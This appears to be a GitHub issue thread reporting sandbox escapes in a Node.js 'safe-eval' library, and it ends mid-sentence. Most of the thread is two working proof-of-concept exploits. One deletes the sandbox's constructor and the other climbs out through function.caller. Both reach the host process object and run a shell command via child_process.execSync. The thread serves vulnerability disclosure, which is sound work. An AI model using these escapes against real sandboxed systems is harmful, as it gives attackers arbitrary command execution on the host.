Breakout #18
Comments
@XmiliaH Just curious, I am not able to replicate the bug on node On the other node, #19 works perfectly (based on your vm2 escape).
@a0xnirudh yes, with v12.10.0 it also does not work. However there is an easy fix:

```js
const safeEval = require('./index');
const code = '(' + function (){
    delete this.constructor;
    const HostObject = this.constructor;
    const HostFunction = HostObject.is.constructor;
    const process = HostFunction('return process')();
    return process.mainModule.require('child_process').execSync('whoami').toString();
} + ')()';
try {
    console.log(safeEval(code));
} catch (e) {
    console.log(e);
}
```

Delete the constructor first.
Bonus, climb up with the function.caller property:

```js
const code = '(' + function (){
    const key = Object.getOwnPropertyNames(this).find(k => k.startsWith('SAFE_EVAL_'));
    function getter() {
        const HostFunction = getter.caller.constructor;
        const process = HostFunction('return process')();
        return process.mainModule.require('child_process').execSync('whoami').toString();
    }
    Object.defineProperty(this, key, {
        get: getter
    });
} + ')()';
try {
    console.log(safeEval(code));
} catch (e) {
    console.log(e);
}
```
Hi,

@XmiliaH Thanks for the repro. That is fairly scary that this is unpatched with so many downloads every week!
It is possible to get access to the host's process object as shown in: